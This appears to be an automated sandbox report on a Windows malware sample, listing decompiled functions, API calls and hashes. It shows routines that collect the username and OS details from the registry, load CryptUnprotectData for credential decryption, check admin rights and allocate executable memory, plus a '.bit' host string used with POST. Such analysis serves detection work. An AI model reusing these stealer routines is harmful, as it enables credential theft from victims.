                            • String ID: .bit$4188DA24$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$wininet.dll
                            • API String ID: 2047011702-3379068564
                            • Opcode ID: 0da7cbf54a970580aa0b26cc4aa0c5e3ec31825bdda546eca6c3c88b70640b78
                            • Instruction ID: 25a4a03a9f7ad5ca19830e541fee6fd6c7da8d6099e3497fbdcec988a6cf554b
                            • Opcode Fuzzy Hash: 0da7cbf54a970580aa0b26cc4aa0c5e3ec31825bdda546eca6c3c88b70640b78
                            • Instruction Fuzzy Hash: 1CE1FFB1900218ABDB10EFA5CC46FDEBBB8BF48305F10457AF504B7691DB78AA45CB58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,72D08B8C), ref: 004A018C
                            • VirtualProtect.KERNEL32(?,?,00000040,?), ref: 004A01FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544445284.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false
                            Similarity
                            • API ID: Virtual$AllocProtect
                            • String ID: $a
                            • API String ID: 2447062925-206647194
                            • Opcode ID: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
                            • Instruction ID: 32f35f77c26991cdd7d3a413109c7dd3f5cc8f944ba48d7e458e609993ac7a73
                            • Opcode Fuzzy Hash: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
                            • Instruction Fuzzy Hash: 2CC16871508301CFCB24CF24C494B2AB7E2FF9A314F55896EE8869B352C775E849CB56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00460620
                            • VirtualAlloc.KERNEL32(00000000,0000078E,00003000,00000040), ref: 00460E91
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544411405.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false
                            Similarity
                            • API ID: AllocVirtual
                            • String ID: $%^&$VirtualAlloc
                            • API String ID: 4275171209-2930927500
                            • Opcode ID: a97786759e54dfb22ed3f7dda0be957b5147da7297c0018401eaeb001c559ff2
                            • Instruction ID: edf7f7eec6db4acfbacbbe2182e2a6d0dca53c4ae9080f9e249849febba98166
                            • Opcode Fuzzy Hash: a97786759e54dfb22ed3f7dda0be957b5147da7297c0018401eaeb001c559ff2
                            • Instruction Fuzzy Hash: 3A51F830E042998FDF11DB68C4947EFBBF1AF59304F18409AD585AB342D6B94921CF6A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E004065F0(void* __eax) {
                            				short _v516;
                            				int _t7;
                            				void* _t12;
                            				DWORD* _t15;
                            
                            				_t15 =  &_v516;
                            				_t12 = __eax;
                            				 *_t15 = 0xff;
                            				_t7 = GetUserNameW( &_v516, _t15); // executed
                            				if(_t7 == 0) {
                            					return E00403BDC(_t12);
                            				}
                            				return E00403D6C(_t12, 0x100,  &_v516);
                            			}

                            APIs
                            • GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: NameUser
                            • String ID:
                            • API String ID: 2645101109-0
                            • Opcode ID: 13019b4b1f29ee0087aebdb125924ac5399b3b0493059617e1aab9744803bb35
                            • Instruction ID: 8736a32cbc394a18a167da55deab102dfeb87f5e75d2630db682c36262db7282
                            • Opcode Fuzzy Hash: 13019b4b1f29ee0087aebdb125924ac5399b3b0493059617e1aab9744803bb35
                            • Instruction Fuzzy Hash: 26E086717042024BD310AF6CDC81A9976E89B48315F00483AB896D73D1FE3DDE189757
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00406BD8(void* __eax) {
                            				char _v516;
                            				int _v520;
                            				void* _v524;
                            				long _t13;
                            				long _t19;
                            				long _t23;
                            				void* _t26;
                            
                            				_t26 = __eax;
                            				_v520 = 0x100;
                            				E00403C18(__eax, 0x406c70);
                            				_t13 = RegCreateKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0, 0, 0x20019, 0,  &_v524, 0); // executed
                            				if(_t13 == 0) {
                            					_t19 = RegQueryValueExW(_v524, L"ProductName", 0, 0,  &_v516,  &_v520); // executed
                            					if(_t19 == 0) {
                            						E00403D6C(_t26, 0x100,  &_v516);
                            					}
                            					_t23 = RegCloseKey(_v524); // executed
                            					return _t23;
                            				}
                            				return _t13;
                            			}

                            APIs
                              • Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E
                            • RegCreateKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000000,00000000,00020019,00000000,?,00000000,?,00406D40,00000000,00406E52), ref: 00406C1A
                            • RegQueryValueExW.KERNEL32(?,ProductName,00000000,00000000,?,?,?,00406D40,00000000,00406E52,?,?,?,00000006,00000000,00000000), ref: 00406C3F
                            • RegCloseKey.KERNEL32(00000000,?,00406D40,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 00406C60
                            Strings
                            • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00406C09
                            • ProductName, xrefs: 00406C2E
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AllocCloseCreateQueryStringValue
                            • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                            • API String ID: 3260168215-1787575317
                            • Opcode ID: 09c98a5aa4f7f8a43bb87bbdd4569b0506a6d9cca1e5576b00417c1847076580
                            • Instruction ID: 11e12cba7479b8b01b9fafc70b7cecbc040d8651ce68523128cfa86d41fe4498
                            • Opcode Fuzzy Hash: 09c98a5aa4f7f8a43bb87bbdd4569b0506a6d9cca1e5576b00417c1847076580
                            • Instruction Fuzzy Hash: A4011E703843016BE310DA58CC81F4673E8EB48B04F104435B695EB2D0DAB4ED14975A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0040A6AA() {
                            				void* _t1;
                            				struct HINSTANCE__* _t2;
                            				_Unknown_base(*)()* _t3;
                            
                            				 *0x41ca68 =  *0x41ca68 - 1;
                            				if( *0x41ca68 < 0) {
                            					_t2 = LoadLibraryA("crypt32.dll"); // executed
                            					_t3 = GetProcAddress(_t2, "CryptUnprotectData");
                            					 *0x41ca64 = _t3;
                            					return _t3;
                            				}
                            				return _t1;
                            			}

                            APIs
                            • LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 0040A6BF
                            • GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 0040A6C5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: CryptUnprotectData$crypt32.dll
                            • API String ID: 2574300362-1827663648
                            • Opcode ID: 6dc0792021c7f50060aa7ba59d25f2a2961755a6251dfcb882a20cdecde9314b
                            • Instruction ID: e6c421c79dddd478bde07d5489d503c1d4cc859a9cbe04b01679e24e10095fcf
                            • Opcode Fuzzy Hash: 6dc0792021c7f50060aa7ba59d25f2a2961755a6251dfcb882a20cdecde9314b
                            • Instruction Fuzzy Hash: 49C08CF06A030056CA01EBB29D4A70833693B82B887180C3BB040B14E0D93E4010970F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 68%
                            			E00401870() {
                            				void* _t11;
                            				signed int _t13;
                            				intOrPtr _t19;
                            				void* _t20;
                            				intOrPtr _t23;
                            
                            				_push(_t23);
                            				_push(E00401926);
                            				_push( *[fs:edx]);
                            				 *[fs:edx] = _t23;
                            				_push(0x41c5b4);
                            				L004011C4();
                            				if( *0x41c035 != 0) {
                            					_push(0x41c5b4);
                            					L004011CC();
                            				}
                            				E00401234(0x41c5d4);
                            				E00401234(0x41c5e4);
                            				E00401234(0x41c610);
                            				_t11 = LocalAlloc(0, 0xff8); // executed
                            				 *0x41c60c = _t11;
                            				if( *0x41c60c != 0) {
                            					_t13 = 3;
                            					do {
                            						_t20 =  *0x41c60c; // 0x0
                            						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                            						_t13 = _t13 + 1;
                            					} while (_t13 != 0x401);
                            					 *((intOrPtr*)(0x41c5f8)) = 0x41c5f4;
                            					 *0x41c5f4 = 0x41c5f4;
                            					 *0x41c600 = 0x41c5f4;
                            					 *0x41c5ac = 1;
                            				}
                            				_pop(_t19);
                            				 *[fs:eax] = _t19;
                            				_push(E0040192D);
                            				if( *0x41c035 != 0) {
                            					_push(0x41c5b4);
                            					L004011D4();
                            					return 0;
                            				}
                            				return 0;
                            			}

                            APIs
                            • RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                            • RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                            • LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                            • RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                            • String ID:
                            • API String ID: 730355536-0
                            • Opcode ID: 9b657d0b75037388d40e8a3bdb897a19649f14ac25332c2b6ca82d813131726e
                            • Instruction ID: 5328ea8a61f1b3c3886908a4d7eb6976bfaff4b38786c7c23389d9dab3a387f7
                            • Opcode Fuzzy Hash: 9b657d0b75037388d40e8a3bdb897a19649f14ac25332c2b6ca82d813131726e
                            • Instruction Fuzzy Hash: 06015BB0684390AEE719AB6A9C967957F92D749704F05C0BFE100BA6F1CB7D5480CB1E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                              • Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                              • Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                              • Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                            • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,004020D8), ref: 00401FA7
                            • RtlLeaveCriticalSection.KERNEL32(0041C5B4,004020DF), ref: 004020D2
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                            • String ID:
                            • API String ID: 2227675388-0
                            • Opcode ID: 0c1c8bb305bbff8ba2aa7aa2b7d32e669c82bb45643f7d7afb35836f5abc82eb
                            • Instruction ID: 60aaef5d71d1198278099ac2c9ce8b9a20775f5f033974ed56173d7c89f55220
                            • Opcode Fuzzy Hash: 0c1c8bb305bbff8ba2aa7aa2b7d32e669c82bb45643f7d7afb35836f5abc82eb
                            • Instruction Fuzzy Hash: DA41CDB1A813019FD714CF29DDC56AABBA1EB59318B24C27FD505E77E1E378A841CB08
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407D02), ref: 00407CD5
                            • FreeSid.ADVAPI32(00000000,00407D09), ref: 00407CFC
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CheckFreeMembershipToken
                            • String ID:
                            • API String ID: 3914140973-0
                            • Opcode ID: 684da7f1912ccf8d100af4d66f16fe37e0ade1452f73a65b9e57601f8946f401
                            • Instruction ID: b2bf85b2e2b23abc2f4a0e5b7d3564ce2fd94028ae90e1c3f906036a39e7bd64
                            • Opcode Fuzzy Hash: 684da7f1912ccf8d100af4d66f16fe37e0ade1452f73a65b9e57601f8946f401
                            • Instruction Fuzzy Hash: 97216F75A48348BEE701CBA8CC45FAE77FCEB09704F4084B2F510E3291D375AA08875A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407D02), ref: 00407CD5
                            • FreeSid.ADVAPI32(00000000,00407D09), ref: 00407CFC
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CheckFreeMembershipToken
                            • String ID:
                            • API String ID: 3914140973-0
                            • Opcode ID: 3350cafe3f8cf2e0daa8d574530435bc3faf7afc8018acb51f9e67137038bbf3
                            • Instruction ID: 07ef963ec0b68deb3fcaff7dc025a93d4964a205a3b7442176a44215fb39e405
                            • Opcode Fuzzy Hash: 3350cafe3f8cf2e0daa8d574530435bc3faf7afc8018acb51f9e67137038bbf3
                            • Instruction Fuzzy Hash: B6215E75A48248BEE701CBA8DC81FAE77F8EB09700F5085B2F510E36E1D375AA098759
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407DD2), ref: 00407D95
                            • FreeSid.ADVAPI32(00000000,00407DD9), ref: 00407DCC
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AccountFreeLookup
                            • String ID:
                            • API String ID: 3905513331-0
                            • Opcode ID: 5e83c9b084e7e35297349d76812e9dffc00df868e7d935d63620226d682594f6
                            • Instruction ID: 27b9dc68911105edb543898119344a1168ea53adb1432c2ff39c990f87532faf
                            • Opcode Fuzzy Hash: 5e83c9b084e7e35297349d76812e9dffc00df868e7d935d63620226d682594f6
                            • Instruction Fuzzy Hash: 0E21B575A04209AFDB41CBA8DC51BEFB7F8EB08700F104466EA14E7290E775AA008BA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 79%
                            			E004033F4() {
                            				struct HINSTANCE__* _t24;
                            				void* _t32;
                            				intOrPtr _t35;
                            				void* _t45;
                            
                            				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
                            					L3:
                            					if( *0x41b004 != 0) {
                            						E004032DC();
                            						E00403368(_t32);
                            						 *0x41b004 = 0;
                            					}
                            					L5:
                            					while(1) {
                            						if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
                            							 *0x0041C634 = 0;
                            						}
                            						E004031DC();
                            						if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
                            							_t14 =  *0x0041C638;
                            							if( *0x0041C638 != 0) {
                            								E004048EC(_t14);
                            								_t35 =  *((intOrPtr*)(0x41c638));
                            								_t7 = _t35 + 0x10; // 0x0
                            								_t24 =  *_t7;
                            								_t8 = _t35 + 4; // 0x400000
                            								if(_t24 !=  *_t8 && _t24 != 0) {
                            									FreeLibrary(_t24);
                            								}
                            							}
                            						}
                            						E004031B4();
                            						if( *((char*)(0x41c650)) == 1) {
                            							 *0x0041C64C();
                            						}
                            						if( *((char*)(0x41c650)) != 0) {
                            							E00403338();
                            						}
                            						if( *0x41c628 == 0) {
                            							if( *0x41c018 != 0) {
                            								 *0x41c018();
                            							}
                            							ExitProcess( *0x41b000); // executed
                            						}
                            						memcpy(0x41c628,  *0x41c628, 0xb << 2);
                            						_t45 = _t45 + 0xc;
                            						0x41b000 = 0x41b000;
                            					}
                            				} else {
                            					do {
                            						 *0x41c030 = 0;
                            						 *((intOrPtr*)( *0x41c030))();
                            					} while ( *0x41c030 != 0);
                            					goto L3;
                            				}
                            			}

                            APIs
                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 00403479
                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 004034AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: ExitFreeLibraryProcess
                            • String ID:
                            • API String ID: 1404682716-0
                            • Opcode ID: 83c72d89bf64d36d3e307e14c4e851507ac80ccff3e714fe6ab68af5963cad7f
                            • Instruction ID: 3efb88752543cb7b7411b8850ba760202313331cae5217d67b69a3078a3e17bb
                            • Opcode Fuzzy Hash: 83c72d89bf64d36d3e307e14c4e851507ac80ccff3e714fe6ab68af5963cad7f
                            • Instruction Fuzzy Hash: 772162709002408BDB229F6684847577FD9AB49356F2585BBE844AF2C6D77CCEC0C7AD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 79%
                            			E004033EC() {
                            				intOrPtr* _t13;
                            				struct HINSTANCE__* _t27;
                            				void* _t36;
                            				intOrPtr _t39;
                            				void* _t52;
                            
                            				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
                            				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
                            					L5:
                            					if( *0x41b004 != 0) {
                            						E004032DC();
                            						E00403368(_t36);
                            						 *0x41b004 = 0;
                            					}
                            					L7:
                            					if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
                            						 *0x0041C634 = 0;
                            					}
                            					E004031DC();
                            					if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
                            						_t17 =  *0x0041C638;
                            						if( *0x0041C638 != 0) {
                            							E004048EC(_t17);
                            							_t39 =  *((intOrPtr*)(0x41c638));
                            							_t7 = _t39 + 0x10; // 0x0
                            							_t27 =  *_t7;
                            							_t8 = _t39 + 4; // 0x400000
                            							if(_t27 !=  *_t8 && _t27 != 0) {
                            								FreeLibrary(_t27);
                            							}
                            						}
                            					}
                            					E004031B4();
                            					if( *((char*)(0x41c650)) == 1) {
                            						 *0x0041C64C();
                            					}
                            					if( *((char*)(0x41c650)) != 0) {
                            						E00403338();
                            					}
                            					if( *0x41c628 == 0) {
                            						if( *0x41c018 != 0) {
                            							 *0x41c018();
                            						}
                            						ExitProcess( *0x41b000); // executed
                            					}
                            					memcpy(0x41c628,  *0x41c628, 0xb << 2);
                            					_t52 = _t52 + 0xc;
                            					0x41b000 = 0x41b000;
                            					goto L7;
                            				} else {
                            					do {
                            						 *0x41c030 = 0;
                            						 *((intOrPtr*)( *0x41c030))();
                            					} while ( *0x41c030 != 0);
                            					goto L5;
                            				}
                            			}

                            APIs
                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 00403479
                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 004034AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: ExitFreeLibraryProcess
                            • String ID:
                            • API String ID: 1404682716-0
                            • Opcode ID: 712c545abaf320befb2a29c50df4fdabf10e6ed2be12c49fdfa7e8256cdbd3e8
                            • Instruction ID: a7f10c8a2f0efa7893578dab7d1fe92da90b98ef6ff2cf319ec6d8299990f2f9
                            • Opcode Fuzzy Hash: 712c545abaf320befb2a29c50df4fdabf10e6ed2be12c49fdfa7e8256cdbd3e8
                            • Instruction Fuzzy Hash: 922132709002408FDB229F6584847567FA9AF49316F1585BBE844AE2D6D77CCAC0C79D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 79%
                            			E004033F0() {
                            				struct HINSTANCE__* _t26;
                            				void* _t35;
                            				intOrPtr _t38;
                            				void* _t51;
                            
                            				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
                            					L4:
                            					if( *0x41b004 != 0) {
                            						E004032DC();
                            						E00403368(_t35);
                            						 *0x41b004 = 0;
                            					}
                            					L6:
                            					if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
                            						 *0x0041C634 = 0;
                            					}
                            					E004031DC();
                            					if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
                            						_t16 =  *0x0041C638;
                            						if( *0x0041C638 != 0) {
                            							E004048EC(_t16);
                            							_t38 =  *((intOrPtr*)(0x41c638));
                            							_t7 = _t38 + 0x10; // 0x0
                            							_t26 =  *_t7;
                            							_t8 = _t38 + 4; // 0x400000
                            							if(_t26 !=  *_t8 && _t26 != 0) {
                            								FreeLibrary(_t26);
                            							}
                            						}
                            					}
                            					E004031B4();
                            					if( *((char*)(0x41c650)) == 1) {
                            						 *0x0041C64C();
                            					}
                            					if( *((char*)(0x41c650)) != 0) {
                            						E00403338();
                            					}
                            					if( *0x41c628 == 0) {
                            						if( *0x41c018 != 0) {
                            							 *0x41c018();
                            						}
                            						ExitProcess( *0x41b000); // executed
                            					}
                            					memcpy(0x41c628,  *0x41c628, 0xb << 2);
                            					_t51 = _t51 + 0xc;
                            					0x41b000 = 0x41b000;
                            					goto L6;
                            				} else {
                            					do {
                            						 *0x41c030 = 0;
                            						 *((intOrPtr*)( *0x41c030))();
                            					} while ( *0x41c030 != 0);
                            					goto L4;
                            				}
                            			}

                            APIs
                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 00403479
                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 004034AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: ExitFreeLibraryProcess
                            • String ID:
                            • API String ID: 1404682716-0
                            • Opcode ID: 1d3e21be2f222e88a5ce5129c4af818b1f382a2d1c87c05034a25e8df98eeb83
                            • Instruction ID: 9b75380a0c1bb1c5ffdc64597b03c40b9c34cb72d282d073c18e6e74c6ec6d76
                            • Opcode Fuzzy Hash: 1d3e21be2f222e88a5ce5129c4af818b1f382a2d1c87c05034a25e8df98eeb83
                            • Instruction Fuzzy Hash: F42141709002408BDB229F6684847567FA9AF49316F2585BBE844AE2C6D77CCAC0CB9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 65%
                            			E00406E68(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
                            				char _v8;
                            				char _v12;
                            				int _v16;
                            				int _v20;
                            				void* _v24;
                            				char _v536;
                            				void* _t18;
                            				intOrPtr _t52;
                            				void* _t56;
                            
                            				_t18 = __eax - 0x55000000;
                            				_v12 = __ecx;
                            				_v8 = __edx;
                            				E00404150( &_v8);
                            				E00404150( &_v12);
                            				_push(_t56);
                            				_push(0x406f1f);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t56 + 0xfffffdec;
                            				_v20 = 0xfe;
                            				_v536 = 0;
                            				RegOpenKeyExW(_t18, E00403D98(_v8), 0, 0x20119,  &_v24); // executed
                            				RegQueryValueExW(_v24, E00403D98(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
                            				E00403D6C(_a4, 0x100,  &_v536);
                            				_pop(_t52);
                            				 *[fs:eax] = _t52;
                            				_push(E00406F26);
                            				return E00403BF4( &_v12, 2);
                            			}

                            APIs
                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                            • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406EC8
                            • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406EEF
                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: String$AllocFreeOpenQueryValue
                            • String ID:
                            • API String ID: 967375698-0
                            • Opcode ID: 75d402b96af35ef4be622c85e7f42c5874bf5a9438753516473e280561b1ff26
                            • Instruction ID: 95dba4e9abc9c412b13e6587c625634e660d61312d90d7235186b1c7fae4ad03
                            • Opcode Fuzzy Hash: 75d402b96af35ef4be622c85e7f42c5874bf5a9438753516473e280561b1ff26
                            • Instruction Fuzzy Hash: DB114970600209AFD700EF98D992ADEBBFCEF48704F4000B6B508E7291E774AB448BA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 65%
                            			E00406E6C(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
                            				char _v8;
                            				char _v12;
                            				int _v16;
                            				int _v20;
                            				void* _v24;
                            				char _v536;
                            				void* _t44;
                            				intOrPtr _t51;
                            				void* _t55;
                            
                            				_v12 = __ecx;
                            				_v8 = __edx;
                            				_t44 = __eax;
                            				E00404150( &_v8);
                            				E00404150( &_v12);
                            				_push(_t55);
                            				_push(0x406f1f);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t55 + 0xfffffdec;
                            				_v20 = 0xfe;
                            				_v536 = 0;
                            				RegOpenKeyExW(_t44, E00403D98(_v8), 0, 0x20119,  &_v24); // executed
                            				RegQueryValueExW(_v24, E00403D98(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
                            				E00403D6C(_a4, 0x100,  &_v536);
                            				_pop(_t51);
                            				 *[fs:eax] = _t51;
                            				_push(E00406F26);
                            				return E00403BF4( &_v12, 2);
                            			}

                            APIs
                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                            • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406EC8
                            • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406EEF
                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: String$AllocFreeOpenQueryValue
                            • String ID:
                            • API String ID: 967375698-0
                            • Opcode ID: 93ffc18aff940630c773c39f869c9b73eb077ec6050040de7a5362879dcd2ece
                            • Instruction ID: d6839de15ce0d986496e2f56cedbfcdd5c795bc72117923b9a37f873fbd9eab1
                            • Opcode Fuzzy Hash: 93ffc18aff940630c773c39f869c9b73eb077ec6050040de7a5362879dcd2ece
                            • Instruction Fuzzy Hash: E0111971640209AFD700EB99DD86EDEBBFCEF48704F5000B6B508E7291DB74AB448A65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E004011E4() {
                            				intOrPtr* _t4;
                            				void* _t5;
                            				void _t6;
                            				intOrPtr* _t9;
                            				void* _t12;
                            				void* _t14;
                            
                            				if( *0x41c5d0 != 0) {
                            					L5:
                            					_t4 =  *0x41c5d0;
                            					 *0x41c5d0 =  *_t4;
                            					return _t4;
                            				} else {
                            					_t5 = LocalAlloc(0, 0x644); // executed
                            					_t12 = _t5;
                            					if(_t12 != 0) {
                            						_t6 =  *0x41c5cc; // 0x0
                            						 *_t12 = _t6;
                            						 *0x41c5cc = _t12;
                            						_t14 = 0;
                            						do {
                            							_t2 = (_t14 + _t14) * 8; // 0x4
                            							_t9 = _t12 + _t2 + 4;
                            							 *_t9 =  *0x41c5d0;
                            							 *0x41c5d0 = _t9;
                            							_t14 = _t14 + 1;
                            						} while (_t14 != 0x64);
                            						goto L5;
                            					} else {
                            						return 0;
                            					}
                            				}
                            			}

                            APIs
                            • LocalAlloc.KERNEL32(00000000,00000644,?,0041C5D4,00401247,?,?,00401447,?,00100000,00002000,00000004,0041C5E4,?,?), ref: 004011F7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AllocLocal
                            • String ID: LEq
                            • API String ID: 3494564517-751654748
                            • Opcode ID: 1d034d2b76be25e021de9249ef1b5bcb9b446cb3610b695d9b1e5c5957ac038c
                            • Instruction ID: 1b97f869ca2ef78b7edf313f24570502d3759f43221a4d236e640dffafdc993f
